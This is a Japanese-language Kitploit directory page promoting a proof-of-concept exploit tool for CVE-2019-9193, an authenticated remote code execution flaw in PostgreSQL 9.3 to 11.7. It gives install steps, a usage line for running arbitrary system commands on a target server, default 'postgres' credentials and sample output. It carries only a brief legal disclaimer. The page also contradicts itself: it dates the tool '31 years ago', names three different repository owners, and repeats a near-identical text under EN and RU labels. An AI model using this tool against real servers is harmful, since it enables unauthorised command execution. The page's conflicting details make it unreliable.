Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/jhnhnck/cve-2019-9193
脆弱性分析エクスプロイトペネトレーションテスト学習と教育データベースセキュリティ
GitHubjhnhnck/cve-2019-9193

CVE-2019-9193

特定のPostgreSQLバージョン(9.3~11.7)における認証済みリモートコード実行(RCE)脆弱性を悪用するために設計されたPoCツール

リポジトリを見る
31年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

EN

GenPostgresRCEExploit は、特定バージョンの PostgreSQL (9.3 ~ 11.7) における認証済みリモートコード実行 (RCE) 脆弱性を悪用するために設計された PoC ツールです。認証されたユーザーが、CVE-2019-9193 の影響を受ける PostgreSQL データベースサーバー上でシステムコマンドを実行できるようにします。

特徴

  • RCE の悪用: 認証済みの PostgreSQL セッションを介してシステムコマンドを実行します。
  • バージョンチェック: 対象の PostgreSQL サーバーのバージョンを確認し、脆弱性の有無を判定します。
  • コマンド実行: 脆弱性がある場合、サーバー上で任意のコマンドを実行できます。
  • 自動テーブル管理: 手動操作なしでコマンドを実行するための一時テーブルを作成・削除します。

必要条件

  • Python 3.x
  • PostgreSQL Python ライブラリ (pip から psycopg2)
  • PostgreSQL ライブラリヘッダー (apt から libpq-dev)

インストール

  1. リポジトリをクローン:
    root@kitploit:~
    git clone https://github.com/AxthonyV/CVE-2019-9193
    cd CVE-2019-9193
    
  • 必要なパッケージをインストール:
    root@kitploit:~
    pip install -r requirements.txt
    
  • 使い方

    root@kitploit:~
    python3 GenPostgresRCEExploit.py -i <target_ip> -p <port> -d <database_name> -U <username> -P <password> -c "<system_command>"
    

    オプション

    • -i, --ip: PostgreSQL サーバーの IP アドレス (デフォルト: 127.0.0.1)
    • -p, --port: PostgreSQL サーバーのポート (デフォルト: 5432)
    • -d, --database: PostgreSQL データベース名 (デフォルト: template1)
    • -U, --user: PostgreSQL サーバーに接続するユーザー名 (デフォルト: postgres)
    • -P, --password: PostgreSQL サーバーに接続するパスワード (デフォルト: postgres)
    • -c, ---command: サーバー上で実行するシステムコマンド
    • -t, --timeout: 接続タイムアウト (秒) (デフォルト: 10)

    例

    root@kitploit:~
    python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
    

    この例では、192.168.1.10 の PostgreSQL サーバーに接続し、指定された認証情報で認証した後、whoami コマンドを実行します。

    出力例

    root@kitploit:~
    $ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
    
    [+] PostgreSQL データベースに接続中: 192.168.1.10:5432
    [+] 接続が正常に確立されました
    [+] PostgreSQL バージョンチェック
    [+] 脆弱な PostgreSQL バージョンを検出: 10.4
    [+] 一時テーブル作成: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
    [+] コマンドが正常に実行されました
    
    postgres
    

    免責事項

    このツールは教育目的および倫理的なテスト専用に作られています。許可なくシステムに対してこのツールを使用することは違法であり、厳しく禁止されています。作者は誤用に対して一切の責任を負いません。

    RU

    GenPostgresRCEExploit は、特定バージョンの PostgreSQL (9.3 ~ 11.7) におけるリモートコード実行 (RCE) 脆弱性を悪用するために設計された PoC エクスプロイトです。このプログラムにより、認証されたユーザーは CVE-2019-9193 の影響を受ける PostgreSQL サーバー上でシステムコマンドを実行できます。

    特徴

    • RCE の悪用: PostgreSQL への認証済み接続を介してシステムコマンドを実行します。
    • バージョンチェック: 対象の PostgreSQL サーバーのバージョンを確認し、脆弱性の有無を判定します。
    • コマンド実行: 脆弱性が存在する場合、サーバー上で任意のコマンドを実行できます。
    • テーブル管理: コマンド実行のための一時テーブルを自動的に作成・削除します。

    必要条件

    • Python 3.x
    • PostgreSQL クライアントライブラリ (psycopg2 パッケージ)

    インストール

    1. リポジトリをクローン:
      root@kitploit:~
      git clone https://github.com/geniuszly/CVE-2019-9193
      cd CVE-2019-9193
      
    2. 必要なパッケージをインストール:
      root@kitploit:~
      pip install -r requirements.txt
      

    使い方

    root@kitploit:~
    python3 GenPostgresRCEExploit.py -i <IP アドレス> -p <ポート> -d <データベース名> -U <ユーザー> -P <パスワード> -c "<システムコマンド>"
    

    オプション

    • -i, --ip: PostgreSQL サーバーの IP アドレス (デフォルト: 127.0.0.1)
    • -p, --port: PostgreSQL サーバーのポート (デフォルト: 5432)
    • -d, --database: PostgreSQL データベース名 (デフォルト: template1)
    • -U, --user: PostgreSQL サーバーに接続するユーザー名 (デフォルト: postgres)
    • -P, --password: PostgreSQL サーバーに接続するパスワード (デフォルト: postgres)
    • -c, --command: サーバー上で実行するシステムコマンド
    • -t, --timeout: 接続タイムアウト (秒) (デフォルト: 10)

    例

    root@kitploit:~
    python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
    

    この例では、プログラムは 192.168.1.10 の PostgreSQL サーバーに接続し、指定された認証情報で認証した後、whoami コマンドを実行します。

    出力例

    root@kitploit:~
    $ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
    
    [+] PostgreSQL データベースに接続中: 192.168.1.10:5432
    [+] 接続が正常に確立されました
    [+] PostgreSQL バージョンチェック
    [+] 脆弱な PostgreSQL バージョンを検出: 10.4
    [+] 一時テーブル作成: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
    [+] コマンドが正常に実行されました
    
    postgres
    

    免責事項

    このツールは教育目的および合法的なテストのみを目的としています。許可なくシステムに対してこのツールを使用することは違法であり、厳しく禁止されています。作者は誤用について一切の責任を負いません。

    ツールをダウンロード